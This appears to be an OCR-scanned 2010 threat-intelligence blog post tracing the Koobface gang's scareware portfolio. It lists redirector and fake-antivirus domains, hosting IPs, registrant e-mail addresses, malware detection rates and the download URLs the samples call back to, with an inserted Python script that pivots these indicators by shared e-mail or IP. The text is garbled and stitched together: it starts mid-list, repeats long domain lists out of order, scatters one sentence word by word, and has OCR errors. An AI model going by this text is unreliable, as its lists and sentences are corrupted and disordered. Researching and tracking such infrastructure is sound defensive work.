my-pc-online-scanr .com - Email: dillinzerl@yahoo.com
my-pc-online-scanv .com - Email: dillinzerl@yahoo.com
n1-system-scanner .com - Email: JayRKibbe@live.com
n2-system-scanner .com - Email: JayRKibbe@live.com
nasa-antivirus1 .com - Email: call555call@live.com
nasa-antivirus3 .com - Email: call555call@live.com
nasa-antivirusa .com - Email: call555call@live.com
nasa-antivirusb .com - Email: call555call@live.com
nasa-antiviruso .com - Email: call555call@live.com
pc1-system-scanner .com - Email: JayRKibbe@live.com
pc2-system-scanner .com - Email: JayRKibbe@live.com
pro0-antivirus .com - Email: mail@yahoo.com
pro0-system-scanner .com - Email: JayRKibbe@live.com
pro1-system-scanner .com - Email: JayRKibbe@live.com
pro2-antivirus .com - Email: mail@yahoo.com
pro4-antivirus .com - Email: mail@yahoo.com
pro6-antivirus .com - Email: mail@yahoo.com
pro8-antivirus .com - Email: mail@yahoo.com
remote-antispywarec .com - Email: teresa2mail.me@live.com
remote-antispywared .com - Email: teresa2mail.me@live.com
remote-antispywaree .com - Email: teresa2mail.me@live.com
remote-antispywarey .com - Email: teresa2mail.me@live.com
remote-pcl-scanner .com - Email: teresa2mail.me@live.com
remote-pc-scannera .com - Email: teresa2mail.me@live.com
remote-pc-scannerr .com - Email: teresa2mail.me@live.com
remote-pc-scannerv .com - Email: teresa2mail.me@live.com
remote-pc-scannery .com - Email: teresa2mail.me@live.com
scan3antispyware .com - Email: o@mozzilastuf.com
scan6antispyware .com - Email: o@mozzilastuf.com
scan8antispyware .com - Email: o@mozzilastuf.com
scan-antispywarea .com - Email: o@mozzilastuf.com
scan-antispywarec .com - Email: o@mozzilastuf.com
scan-antispywared .com - Email: o@mozzilastuf.com
scan-antispywarez .com - Email: o@mozzilastuf.com
spyware-01-scanner .com - Email: mail@bristonnews.com
spyware-03-scanner .com - Email: mail@bristonnews.com
spyware-05-scanner .com - Email: mail@bristonnews.com
spyware-06-scanner .com - Email: mail@bristonnews.com
spyware-07-scanner .com - Email: mail@bristonnews.com
stcanning-your-computerc .com - Email: mitra66@yahoo.com
stcanning-your-computerd .com - Email: mitra66@yahoo.com
stcanning-your-computerq .com - Email: mitra66@yahoo.com
stcanning-your-computerr .com - Email: mitra66@yahoo.com
stcanning-your-computert .com - Email: mitra66@yahoo.com
stcanning-your-pca .com - Email: mitra66@yahoo.com
stcanning-your-pcb .com - Email: mitra66@yahoo.com
stcanning-your-pcc .com - Email: mitra66@yahoo.com
stcanning-your-pcd .com - Email: mitra66@yahoo.com
stcanning-your-pce .com - Email: mitra66@yahoo.com
stealthv1-antispyware .com - Email: SteveLCartwright@yahoo.com
stealthv2-antispyware .com - Email: SteveLCartwright@yahoo.com
stealthv7-antispyware .com - Email: SteveLCartwright@yahoo.com
stealthv8-antispyware .com - Email: SteveLCartwright@yahoo.com
stealthv9-antispyware .com - Email: SteveLCartwright@yahoo.com
ver1-system-scanner .com - Email: JayRKibbe@live.com
ver2-system-scanner .com - Email: JayRKibbe@live.com
virus-a1-scanner .com - Email: mail@bristonnews.com
virus-b1-scanner .com - Email: mail@bristonnews.com
virus-c1-scanner .com - Email: mail@bristonnews.com
virus-d1-scanner .com - Email: mail@bristonnews.com
virus-e2-scanner .com - Email: mail@bristonnews.com
windowsv5-antispyware .com - Email: SteveLCartwright@yahoo.com
windowsv6-antispyware .com - Email: SteveLCartwright@yahoo.com
windowsv7-antispyware .com - Email: SteveLCartwright@yahoo.com
windowsv8-antispyware .com - Email: SteveLCartwright@yahoo.com
windowsv9-antispyware .com - Email: SteveLCartwright@yahoo.com
z0-online-scanner .com - Email: stellar2@yahoo.com
z1-online-scanner .com - Email: stellar2@yahoo.com
Active scareware domains portfolio (blackhat SEO/Koobface pushed) parked at [24]212.150.164.190 - AS1680 - NV-ASN 013 NetVision Ltd:

antispy-download .org - Email: robertsimonkroon@gmail.com
scanner-virus-free .org - Email: robertsimonkroon@gmail.com
tube-best-porn .org - Email: robertsimonkroon@gmail.com
tube-sex-porn .org - Email: robertsimonkroon@gmail.com
download-free-files .org - Email: robertsimonkroon@gmail.com
tube-porn-best .org - Email: robertsimonkroon@gmail.com
scan-your-pc-now .org - Email: michaeltycoon@gmail.com
scanner-virus-free .com - Email: robertsimonkroon@gmail.com
tube-sex-porn .com - Email: robertsimonkroon@gmail.com
scanner-free-virus .com - Email: robertsimonkroon@gmail.com
tube-porn-best .com - Email: robertsimonkroon@gmail.com
antispy-download .info - Email: robertsimonkroon@gmail.com
soft-download-free .info - Email: robertsimonkroon@gmail.com
scanner-virus-free .info - Email: robertsimonkroon@gmail.com
scanner-free-virus .info - Email: robertsimonkroon@gmail.com
scan-your-pc-now .info - Email: michaeltycoon@gmail.com
adult-tube-free .net - Email: michaeltycoon@gmail.com
scanner-virus-free .net - Email: robertsimonkroon@gmail.com
tube-sex-porn .net - Email: robertsimonkroon@gmail.com
download-free-files .net - Email: michaeltycoon@gmail.com
scanner-free-virus .net - Email: robertsimonkroon@gmail.com
tube-porn-best .net - Email: robertsimonkroon@gmail.com
ekjsoft .eu - Email: robertsimonkroon@gmail.com
antispy-download .biz - Email: robertsimonkroon@gmail.com
soft-download-free .biz - Email: robertsimonkroon@gmail.com
scanner-virus-free .biz - Email: robertsimonkroon@gmail.com
free-malware-scan .biz - Email: robertsimonkroon@gmail.com
tube-best-porn .biz - Email: robertsimonkroon@gmail.com
tube-sex-porn .biz - Email: robertsimonkroon@gmail.com
download-free-files .biz - Email: michaeltycoon@gmail.com
scanner-free-virus .biz - Email: robertsimonkroon@gmail.com
download-free-soft .biz - Email: robertsimonkroon@gmail.com
tube-porn-best .biz - Email: robertsimonkroon@gmail.com
scan-your-pc-now .biz - Email: michaeltycoon@gmail.com
porn-tube-sex .biz - Email: robertsimonkroon@gmail.com
alrzsoft .in - Email: petrenko.kolia@yandex.ru
antispy-download .biz - Email: robertsimonkroon@gmail.com
cool-tube-porn .net - Email: robertsimonkroon@gmail.com
cool-tube-porn .org - Email: robertsimonkroon@gmail.com
download-free-now .net - Email: robertsimonkroon@gmail.com
download-free-now .org - Email: robertsimonkroon@gmail.com
download-free-soft .com - Email: robertsimonkroon@gmail.com
download-free-soft .net - Email: robertsimonkroon@gmail.com
download-scaner-free .com - Email: robertsimonkroon@gmail.com
ekjsoft .eu
fdglsoft .in - Email: petrenko.kolia@yandex.ru
free-virus-scanner .net - Email: robertsimonkroon@gmail.com
kleqsoft .in - Email: petrenko.kolia@yandex.ru
kltysoft .in - Email: petrenko.kolia@yandex.ru
ktyjsoft .in - Email: petrenko.kolia@yandex.ru
kyezsoft .in - Email: petrenko.kolia@yandex.ru
lkrjsoft .in - Email: petrenko.kolia@yandex.ru
lkrtsoft .in - Email: petrenko.kolia@yandex.ru
mgtlsoft .in - Email: petrenko.kolia@yandex.ru
porn-sex-tube .net - Email: robertsimonkroon@gmail.com
porn-sex-tube .org - Email: robertsimonkroon@gmail.com
scan-free-malware .net - Email: robertsimonkroon@gmail.com
scan-free-malware .org - Email: robertsimonkroon@gmail.com
spyware-scaner-free .com - Email: robertsimonkroon@gmail.com
spyware-scaner-free .info - Email: robertsimonkroon@gmail.com
spyware-scaner-free .net - Email: robertsimonkroon@gmail.com
spyware-scaner-free .org - Email: robertsimonkroon@gmail.com
tube-best-porn .biz - Email: robertsimonkroon@gmail.com
tube-best-porn .com - Email: robertsimonkroon@gmail.com
tube-best-porn .net - Email: robertsimonkroon@gmail.com
tube-best-porn .org - Email: robertsimonkroon@gmail.com
tube-porn-sex .info - Email: robertsimonkroon@gmail.com
tube-porn-sex .net - Email: robertsimonkroon@gmail.com
tube-porn-sex .org - Email: robertsimonkroon@gmail.com


What's so special about the robertsimonkroon@gmail.com email anyway? It's the fact that not only was [25]the email once again used to register [26]scareware domains two times in July, 2009, but also, as pointed out in November 2009's "[27]Koobface Botnet's Scareware Business Model - Part Two", the same email was used to register the following download locations for scareware domains pushed by the Koobface botnet:

0ni9ols3feu60 .cn - Email: robertsimonkroon@gmail.com
6j5aq93iu7yv4 .cn - Email: robertsimonkroon@gmail.com
mf6gy4lj79ny5 .cn - Email: robertsimonkroon@gmail.com
84u9wb2hsh4p6 .cn - Email: robertsimonkroon@gmail.com
6pj2h8rqkhfw7 .cn - Email: robertsimonkroon@gmail.com
7cib5fzf462g8 .cn - Email: robertsimonkroon@gmail.com
7bs5nfzfkp8q8 .cn - Email: robertsimonkroon@gmail.com
kt4lwumfhjb7a .cn - Email: robertsimonkroon@gmail.com
q2bf0fzvjb5ca .cn - Email: robertsimonkroon@gmail.com
rncocnspr44va .cn - Email: robertsimonkroon@gmail.com
tleayoft9226b .cn - Email: robertsimonkroon@gmail.com
4go4i9n76ttwd .cn - Email: robertsimonkroon@gmail.com
kzvi4iiutrlle .cn - Email: robertsimonkroon@gmail.com
hxc7jitg7k57e .cn - Email: robertsimonkroon@gmail.com
mfbj6pquvjv8e .cn - Email: robertsimonkroon@gmail.com
mt3pvkfmpi7de .cn - Email: robertsimonkroon@gmail.com
fb7pxcqyb45oe .cn - Email: robertsimonkroon@gmail.com
fyivbrl3b0dyf .cn - Email: robertsimonkroon@gmail.com
z6ailnvi94jgg .cn - Email: robertsimonkroon@gmail.com
ue4x08f5myqdl .cn - Email: robertsimonkroon@gmail.com
p7keflvui9fkl .cn - Email: robertsimonkroon@gmail.com
gjpwsc5p7oe3m .cn - Email: robertsimonkroon@gmail.com
fluqldfi3qkcm .cn - Email: robertsimonkroon@gmail.com
7mxlz5jq0nt3o .cn - Email: robertsimonkroon@gmail.com
3uxyctrlmiqeo .cn - Email: robertsimonkroon@gmail.com
p0umob9k2g7mp .cn - Email: robertsimonkroon@gmail.com
od32qjx6meqos .cn - Email: robertsimonkroon@gmail.com
bnfdxhaelrgey .cn - Email: robertsimonkroon@gmail.com
7zju2l82i2zhz .cn - Email: robertsimonkroon@gmail.com
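The cross-check the post applies by hand, the same registrant e-mail showing up across the redirector list, the scareware portfolio and the .cn download locations, is a mechanical pivot once the lists are parsed. The Python below is an added example, not tooling from the post or its author: it parses entries in the post's own "domain .tld - IP - Email: address" layout (defanging space before the TLD, optional IPs, optional e-mail), then groups domains by shared registrant e-mail and by shared hosting IP. The sample lines are a constructed subset copied from the post's lists.

```python
"""Pivot the post's "domain .tld - IP - Email: address" entries on registrant
e-mail and hosting IP to surface shared infrastructure.

Added example, not the post's own tooling. SAMPLE_LINES is a constructed
subset copied from the post's lists.
"""
import re
from collections import defaultdict

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"

# One list entry as the post writes it: the TLD is usually split off with a
# space (defanging), the IP part is optional and may hold several IPs
# separated by ';' or ',', and the "Email:" field is optional and sometimes
# follows without a dash.
IOC_LINE = re.compile(
    r"^(?P<name>[0-9a-z-]+)\s*\.\s*(?P<tld>[a-z]{2,})"
    rf"(?:\s*-\s*(?P<ips>{IPV4}(?:\s*[;,]\s*{IPV4})*))?"
    r"(?:\s*-?\s*Email:\s*(?P<email>[^\s@]+@[^\s@]+))?"
    r"\s*$",
    re.IGNORECASE,
)


def parse_ioc_line(line):
    """Return {'domain', 'ips', 'email'} for one list entry, or None for lines
    in another layout (e.g. the bare-IP "/psxl/" entries in the post)."""
    m = IOC_LINE.match(line.strip())
    if not m:
        return None
    ips = re.split(r"\s*[;,]\s*", m.group("ips")) if m.group("ips") else []
    email = m.group("email").lower() if m.group("email") else None
    return {"domain": f"{m.group('name')}.{m.group('tld')}".lower(),
            "ips": ips, "email": email}


def parse_ioc_lines(lines):
    """Parse every line, silently dropping the ones that do not fit the layout."""
    return [r for r in (parse_ioc_line(line) for line in lines) if r]


def pivot(records, field):
    """Group domains by shared registrant e-mail ('email') or hosting IP ('ip').
    Only clusters that link two or more domains are returned."""
    index = defaultdict(set)
    for r in records:
        keys = r["ips"] if field == "ip" else ([r["email"]] if r["email"] else [])
        for k in keys:
            index[k].add(r["domain"])
    return {k: sorted(v) for k, v in index.items() if len(v) >= 2}


def tlds_for_email(records, email):
    """TLDs registered under one e-mail; shows a registrant spanning gTLDs and
    the .cn download locations, as the post observes for robertsimonkroon."""
    return sorted({r["domain"].rsplit(".", 1)[1] for r in records if r["email"] == email})


# Constructed sample: a handful of entries copied from the post's lists.
SAMPLE_LINES = [
    "freeticketwin.com - 91.212.226.25 - Email: test@now.net.cn",
    "skypetollfree .com - 96.44.128.245 - Email: test@now.net.cn",
    "nigeriaworldtours .com Email: info@montever.de",
    "malware-b-scan .com - 96.44.128.245; 91.212.226.97; 91.212.226.185 - Email: mail@bristonnews.com",
    "interlantivirus.com - 87.98.130.232- Email: test@now.net.cn",
    "ekjsoft .eu",
    "195.5.161.107/psxl/?vih==RANDOM_STRINGS - no domain name",
    "antispy-download .org - Email: robertsimonkroon@gmail.com",
    "scanner-virus-free .biz - Email: robertsimonkroon@gmail.com",
    "0ni9ols3feu60 .cn - Email: robertsimonkroon@gmail.com",
]

if __name__ == "__main__":
    recs = parse_ioc_lines(SAMPLE_LINES)
    for email, domains in pivot(recs, "email").items():
        print(f"registrant {email}: {', '.join(domains)}")
    for ip, domains in pivot(recs, "ip").items():
        print(f"hosting IP {ip}: {', '.join(domains)}")
```

On the sample the IP pivot ties a redirector (skypetollfree .com) to the scareware host it feeds (malware-b-scan .com) through 96.44.128.245, a link the post states in prose; the e-mail pivot reproduces the robertsimonkroon cluster across .org, .biz and .cn.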

Stay tuned for a massive update on Koobface-related activities, analyzing the gang's multi-tasking throughout the entire January, 2010; descriptive historical OSINT offers long-term value in cross-checking for connections.


Related Koobface gang/botnet research:

[28] How the Koobface Gang Monetizes Mac OS X Traffic
[29] The Koobface Gang Wishes the Industry "Happy Holidays"
[30] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline
[31] Koobface Botnet Starts Serving Client-Side Exploits
[32] Massive Scareware Serving Blackhat SEO, the Koobface Gang Style
[33] Koobface Botnet's Scareware Business Model - Part Two
[34] Koobface Botnet's Scareware Business Model - Part One
[35] Koobface Botnet Redirects Facebook's IP Space to my Blog
[36] New Koobface campaign spoofs Adobe's Flash updater
[37] Social engineering tactics of the Koobface botnet
[38] Koobface Botnet Dissected in a TrendMicro Report
[39] Movement on the Koobface Front - Part Two
[40] Movement on the Koobface Front
[41] Koobface - Come Out, Come Out, Wherever You Are
[42] Dissecting Koobface Worm's Twitter Campaign
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A Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang 

(2010-02-04 00:50) 

With [l]scareware/rogueware/fake security software 
continuing to be the cash-cow choice for the Koobface gang, 













































keeping them on a short leash in order to become the 
biggest [2]opportunity cost for the gang's business model 
crucial. The following are currently active blackhat SEO 
redirectors/Koobface-infected hosts redirectors and actual 
scareware domains courtesy of the gang. 
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Blackhat SEO redirectors, also embedded at Koobface- 
infected hosts, with identical redirector ID (?pid=312s02 

&sid=4dbl2f): 

freeticketwin.com - 91.212.226.25 - Email: 
test@now.net.cn 

lotteryvideowin.com - Email: test@now.net.cn 

videohototplaypoker.com - Email: test@now.net.cn 

financetopsecrets.com - Email: test@now.net.cn 

how2winforex.com - 91.212.226.136 - Email: 
test@now.net.cn 

2money4money.com - Email: test@now.net.cn 

get-money-quickly.com - Email: test@now.net.cn 

fordusedsales .com - 193.104.106.250 - Email: 
test@now.net.cn 

buylexuscustoms .com - 91.212.226.185 - Email: 
test@now.net.cn 

tracegirlsonline .com - 89.248.168.22 - Email: 
test@now.net.cn 


skypetollfree .com - 96.44.128.245 - Email: 
test@now.net.cn 

dendy-trens .com - Email: test@now.net.cn 

pretendtolove .com - Email: test@now.net.cn 

bewareoffreebies .com - Email: test@now.net.cn 

harry-the-potter .com - Email: test@now.net.cn 

getlancomediscount .com - Email: 
baldwinnere@yahoo.co.uk 

vincentvangoghsite .com - Email: contacts@ferra.hu 
jacksonpollocksite .com - Email: contacts@ferra.hu 
Iady2gaga .com - Email: contacts@designt.de 
nigeriaworldtours .com Email: info@montever.de 
americanpiemusicvideo .com - Email: mail@suvtrip.hu 
superstitionmusicvideo .com - Email: mail@suvtrip.hu 
umbrellamusicvideo .com - Email: mail@suvtrip.hu 
discounts-org .com - Email: mail@haselbladtour.com 
littlediscounts .com - Email: mail@haselbladtour.com 
winterdiscounts5 .com - Email: mail@haselbladtour.com 
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chevroletvmodeltoys .com - Email: 

Courtney RWebb@aol.com 

volvomodeltoys .com - Email: CourtneyRWebb@aol.com 

manilawebcamera .com - Email: monkey22@live.com 

mumbaiwebcamera .com - Email: monkey22@live.com 

karachiwebcamera .com - Email: monkey22@live.com 

delhiwebcamera .com - Email: monkey22@live.com 

istanbulwebcamera .com - Email: monkey22@live.com 

lexusmodeltoys .com - Email: monkey22@live.com 

chevroletvmodeltoys .com - Email: 
CourtneyRWebb@aol.com 

bmwmodeltoys .com - Email: CourtneyRWebb@aol.com 

Upon redirection, the scareware is served from malware-b- 
scan .com - 96.44.128.245; 91.212.226.97; 
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91.212.226.185; 91.121.45.67, 91.212.226.203, 
94.228.209.195 - Email: mail@bristonnews.com. 

Sample detection rate for newly introduced scareware 
samples: [3]Setup _312s2.exe - Result: 3/40 (7.5 %), 

[4]Setup _312s2.exe - Result: 4/39, [5]Setup 
_312s22.exe - Result: 2/39 (5.13 %), [6]Setup _312s2.exe 
- Result: 6/39 (15.39 %), [7]Setup _312s2.exe - Result: 

1/40 (2.5 %), [8]Setup _312s2.exe - Result: 1/39 (2.56 %), 
[9]Setup _312s2.exe - Result: 3/39 (7.7 %). [10]Setup 



_312s2.exe - Result: 4/40 (10 %), [ll]Setup _312s2.exe - 
Result: 1/40 (2.5 %), [12]Setup _312s2.exe - Result: 4/40 
(10 %), [13]Setup _312s2.exe - Result: 5/41 (12.2 %), 
[14]Setup _312s2.exe - Result: 5/41 (12.2 %), [15]Setup 
_312s2.exe - Result: 5/41 (12.2 %), [16]Setup _312s2.exe 

- Result: 4/41 (9.76 %), [17]Setup _312s2.exe - Result: 

4/41 (9.76 %), [18]Setup _312s2.exe - Result: 5/41 (12.2 

%), 

[19]Setup _312s2.exe - Result: 4/41 (9.76 %), [20]Setup 
_312s2.exe - Result: 3/41 (7.32 %), [21]Setup _312s2.exe 

- Result: 6/41 (14.63 %), [22]Setup _312s2.exe - Result: 
11/41 (26.83 %), [23]Setup _312s2.exe - Result: 4/42 
(9.53 %). 

Upon execution the sample phones back to winxp7server 
.co m/down load/win logo, bmp - 94.228.208.57; rescuesy- 
supdate .com/?b=312s2 - 83.133.125.216. The most 
recent samples ( Wednesday, February 10, 2010 ) phone back 

to wintimeserver .com/?b=312s2 - 91.212.226.125 and 
firmwaredownloadserver .com/down load/win logo, bmp 

- 94.228.208.57. 

The most recent samples ( Sunday, February 21, 2010) 
phone back to firmwaredown- 

loadserver.com /download/winlogo.bmp - 

94.228.208.57; 

shifustserver.com /download/winlogo.bmp - 

94.228.208.5/94.228.208.57 - Email: viinzer@hotmail.com 
The 


most 



recent 


samples 
( Friday , 

February 

12 , 

2010 ) 

phone 

back 

to 

firmwaredownloadserver 

.com/download/winlogo.bmp - 94.228.208.57; 
checklatestversion .com/?b=312s - 109.232.225.75. 

The most recent samples ( Wednesday, February 24, 2010) 
phone back to 

shifustserver.com/download/winlogo.bmp 

- 94.228.208.57 - Email: viinzer@hotmail.com and version- 
upgrade. com/?b=312sl2 - 89.248.168.21. Parked on the 
same IP are also checklatestversion.com and 
fastwinupdates.com. 
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Parked on the same IPs are more scareware domains part of 
the portfolio: 


interlantivirus.com - 87.98.130.232- Email: 
test@now.net.cn 

virus-scan-d.com - 87.98.130.232 - Email: test@now.net.cn 

bl9-virus-scanner.com - 87.98.130.232 - Email: 
test@now.net.cn 

intera-antivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 

interc-antivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 

interd-antivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 

intere-antivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 

inter-antivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 

interlantivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 

195.5.161.107/psxl/?vih = = RAND0M _STRINGS - no 
domain name 

91.212.132.241 /psxl/?vih = = RANDOM STRINGS 
195.5.161.105 /psxl/?vih = = RANDOM STRINGS 
non-antivirus-scan .com - Email: test@now.net.cn
zin-antivirus-scan .com - Email: test@now.net.cn
nextgen-scannert .com - Email: test@now.net.cn
protectionl5scan .com - Email: test@now.net.cn
nitro-antispyware .com - Email: test@now.net.cn
z2-antispyware .com - Email: test@now.net.cn
spy-detectore .com - Email: admin@clossingt.com
dis7-antivirus .com - Email: admin@vertigosmart.com
v2comp-scanner .com - Email: admin@vertigosmart.com
new-av-scannere .com - Email: missbarlingmail@aol.com
smartvirus-scan6 .com - Email: info@terranova.com
spywaremaxscan4 .com - Email: out@trialzoom.com
super6antispyware .com - Email: mail@ordercom.com
spyware-max-scan3 .com - Email: out@trialzoom.com
max-antivirus-security5 .com - Email: mail@dynadoter.com
winterdiscounts5 .com - Email: mail@haselbladtour.com
11-antivirus .com - Email: call555call@live.com
1-antivirus .com - Email: call555call@live.com
1m-online-scanner .com - Email: stellar2@yahoo.com
2m-online-scanner .com - Email: stellar2@yahoo.com
2pro-antispyware .com - Email: mail@yahoo.com
3pro-antispyware .com - Email: mail@yahoo.com
6-antivirus .com - Email: call555call@live.com
7-antivirus .com - Email: call555call@live.com
9-antivirus .com - Email: call555call@live.com
a0-online-scanner .com - Email: stellar2@yahoo.com
a9-online-scanner .com - Email: stellar2@yahoo.com
aa-antivirus .com - Email: call555call@live.com
aa-online-scanner .com - Email: call555call@live.com
ab-antivirus .com - Email: call555call@live.com
ac-antivirus .com - Email: call555call@live.com
ad-antivirus .com - Email: call555call@live.com
adv1-system-scanner .com - Email: JayRKibbe@live.com
adv2-system-scanner .com - Email: JayRKibbe@live.com
ae-antivirus .com - Email: call555call@live.com
antivirus-expert-a .com - Email: 900ekony@live.com
antivirus-expert-i .com - Email: 900ekony@live.com
antivirus-expert-r .com - Email: 900ekony@live.com
antivirus-expert-y .com - Email: 900ekony@live.com
antivirussystemscanl .com - Email: 900ekony@live.com
antivirussystemscana .com - Email: 900ekony@live.com
army-antispywarea .com - Email: beliec99@yahoo.com
army-antispywarei .com - Email: beliec99@yahoo.com
army-antispywarel .com - Email: beliec99@yahoo.com
army-antispywarep .com - Email: beliec99@yahoo.com
army-antivirusa .com - Email: beliec99@yahoo.com
army-antivirusd .com - Email: beliec99@yahoo.com
army-antivirust .com - Email: beliec99@yahoo.com
army-antivirusv .com - Email: beliec99@yahoo.com
army-antivirusy .com - Email: beliec99@yahoo.com
bl-online-scanner .com - Email: stellar2@yahoo.com

best-antiviruskO .com
bestpd-virusscanner .com - Email: SusanCWagner@yahoo.com
bestpr-virusscanner .com - Email: SusanCWagner@yahoo.com
crystal-antimalware .com - Email: mail@vertigocats.com
crystal-antivirus .com - Email: mail@vertigocats.com
crystal-pro-scan .com - Email: mail@vertigocats.com
crystal-pro-scanner .com - Email: mail@vertigocats.com
crystal-spyscanner .com - Email: mail@vertigocats.com
crystal-threatscanner .com - Email: mail@vertigocats.com
crystal-virusscanner .com - Email: mail@vertigocats.com
extra-spyware-defencea .com - Email: fabula8@live.com
extra-spyware-defenceb .com - Email: fabula8@live.com
malware-a-scan .com - Email: mail@bristonnews.com
malware-b-scan .com - Email: mail@bristonnews.com
malware-c-scan .com - Email: mail@bristonnews.com
malware-d-scan .com - Email: mail@bristonnews.com
malware-t-scan .com - Email: mail@bristonnews.com
mega-antispywarea .com - Email: fabula8@live.com
mega-antispywareb .com - Email: fabula8@live.com
mm-online-scanner .com - Email: stellar2@yahoo.com
my-computer-antivirusa .com - Email: dillinzerl@yahoo.com
my-computer-antivirusb .com - Email: dillinzerl@yahoo.com
my-computer-antiviruse .com - Email: dillinzerl@yahoo.com
my-computer-antivirusq .com - Email: dillinzerl@yahoo.com
my-computer-antivirusw .com - Email: dillinzerl@yahoo.com
my-computer-scanc .com - Email: clintommail2@yahoo.com
my-computer-scane .com - Email: clintommail2@yahoo.com
my-computer-scanl .com - Email: clintommail2@yahoo.com
my-computer-scannera .com - Email: clintommail2@yahoo.com
my-computer-scannerl .com - Email: clintommail2@yahoo.com
my-computer-scannerm .com - Email: clintommail2@yahoo.com
my-computer-scannern .com - Email: clintommail2@yahoo.com
my-computer-scannerv .com - Email: clintommail2@yahoo.com
my-computer-scanw .com - Email: clintommail2@yahoo.com
my-pc-online-scanm .com - Email: dillinzerl@yahoo.com
my-pc-online-scann .com - Email: dillinzerl@yahoo.com
my-pc-online-scanr .com - Email: dillinzerl@yahoo.com
my-pc-online-scanv .com - Email: dillinzerl@yahoo.com
n1-system-scanner .com - Email: JayRKibbe@live.com
n2-system-scanner .com - Email: JayRKibbe@live.com
nasa-antivirus1 .com - Email: call555call@live.com
nasa-antivirus3 .com - Email: call555call@live.com
nasa-antivirusa .com - Email: call555call@live.com
nasa-antivirusb .com - Email: call555call@live.com
nasa-antiviruso .com - Email: call555call@live.com
pc1-system-scanner .com - Email: JayRKibbe@live.com
pc2-system-scanner .com - Email: JayRKibbe@live.com
pro0-antivirus .com - Email: mail@yahoo.com
pro0-system-scanner .com - Email: JayRKibbe@live.com
pro1-system-scanner .com - Email: JayRKibbe@live.com
pro2-antivirus .com - Email: mail@yahoo.com
pro4-antivirus .com - Email: mail@yahoo.com
pro6-antivirus .com - Email: mail@yahoo.com
pro8-antivirus .com - Email: mail@yahoo.com
remote-antispywarec .com - Email: teresa2mail.me@live.com
remote-antispywared .com - Email: teresa2mail.me@live.com
remote-antispywaree .com - Email: teresa2mail.me@live.com
remote-antispywarey .com - Email: teresa2mail.me@live.com
remote-pcl-scanner .com - Email: teresa2mail.me@live.com
remote-pc-scannera .com - Email: teresa2mail.me@live.com
remote-pc-scannerr .com - Email: teresa2mail.me@live.com
remote-pc-scannerv .com - Email: teresa2mail.me@live.com
remote-pc-scannery .com - Email: teresa2mail.me@live.com
scan3antispyware .com - Email: o@mozzilastuf.com
scan6antispyware .com - Email: o@mozzilastuf.com
scan8antispyware .com - Email: o@mozzilastuf.com
scan-antispywarea .com - Email: o@mozzilastuf.com
scan-antispywarec .com - Email: o@mozzilastuf.com
scan-antispywared .com - Email: o@mozzilastuf.com
scan-antispywarez .com - Email: o@mozzilastuf.com
spyware-01-scanner .com - Email: mail@bristonnews.com
spyware-03-scanner .com - Email: mail@bristonnews.com
spyware-05-scanner .com - Email: mail@bristonnews.com
spyware-06-scanner .com - Email: mail@bristonnews.com
spyware-07-scanner .com - Email: mail@bristonnews.com
stcanning-your-computerc .com - Email: mitra66@yahoo.com
stcanning-your-computerd .com - Email: mitra66@yahoo.com
stcanning-your-computerq .com - Email: mitra66@yahoo.com
stcanning-your-computerr .com - Email: mitra66@yahoo.com
stcanning-your-computert .com - Email: mitra66@yahoo.com
stcanning-your-pca .com - Email: mitra66@yahoo.com
stcanning-your-pcb .com - Email: mitra66@yahoo.com
stcanning-your-pcc .com - Email: mitra66@yahoo.com
stcanning-your-pcd .com - Email: mitra66@yahoo.com
stcanning-your-pce .com - Email: mitra66@yahoo.com
stealthv1-antispyware .com - Email: SteveLCartwright@yahoo.com
stealthv2-antispyware .com - Email: SteveLCartwright@yahoo.com
stealthv7-antispyware .com - Email: SteveLCartwright@yahoo.com
stealthv8-antispyware .com - Email: SteveLCartwright@yahoo.com
stealthv9-antispyware .com - Email: SteveLCartwright@yahoo.com
ver1-system-scanner .com - Email: JayRKibbe@live.com
ver2-system-scanner .com - Email: JayRKibbe@live.com
virus-a1-scanner .com - Email: mail@bristonnews.com
virus-a1-scanner .com - Email: mail@bristonnews.com
virus-b1-scanner .com - Email: mail@bristonnews.com
virus-b1-scanner .com - Email: mail@bristonnews.com
virus-c1-scanner .com - Email: mail@bristonnews.com
virus-c1-scanner .com - Email: mail@bristonnews.com
virus-d1-scanner .com - Email: mail@bristonnews.com
virus-d1-scanner .com - Email: mail@bristonnews.com
virus-e2-scanner .com - Email: mail@bristonnews.com
virus-e2-scanner .com - Email: mail@bristonnews.com
windowsv5-antispyware .com - Email: SteveLCartwright@yahoo.com
windowsv6-antispyware .com - Email: SteveLCartwright@yahoo.com
windowsv7-antispyware .com - Email: SteveLCartwright@yahoo.com
windowsv8-antispyware .com - Email: SteveLCartwright@yahoo.com
windowsv9-antispyware .com - Email: SteveLCartwright@yahoo.com
z0-online-scanner .com - Email: stellar2@yahoo.com
z1-online-scanner .com - Email: stellar2@yahoo.com
Active scareware domains portfolio (blackhat SEO/Koobface pushed) parked at [24]212.150.164.190 - AS1680 - NV-ASN 013 NetVision Ltd:

antispy-download .org - Email: robertsimonkroon@gmail.com
scanner-virus-free .org - Email: robertsimonkroon@gmail.com
tube-best-porn .org - Email: robertsimonkroon@gmail.com
tube-sex-porn .org - Email: robertsimonkroon@gmail.com
download-free-files .org - Email: robertsimonkroon@gmail.com
tube-porn-best .org - Email: robertsimonkroon@gmail.com
scan-your-pc-now .org - Email: michaeltycoon@gmail.com
scanner-virus-free .com - Email: robertsimonkroon@gmail.com
tube-sex-porn .com - Email: robertsimonkroon@gmail.com
scanner-free-virus .com - Email: robertsimonkroon@gmail.com
tube-porn-best .com - Email: robertsimonkroon@gmail.com
antispy-download .info - Email: robertsimonkroon@gmail.com
soft-download-free .info - Email: robertsimonkroon@gmail.com
scanner-virus-free .info - Email: robertsimonkroon@gmail.com
scanner-free-virus .info - Email: robertsimonkroon@gmail.com
scan-your-pc-now .info - Email: michaeltycoon@gmail.com
adult-tube-free .net - Email: michaeltycoon@gmail.com
scanner-virus-free .net - Email: robertsimonkroon@gmail.com
tube-sex-porn .net - Email: robertsimonkroon@gmail.com
download-free-files .net - Email: michaeltycoon@gmail.com
scanner-free-virus .net - Email: robertsimonkroon@gmail.com
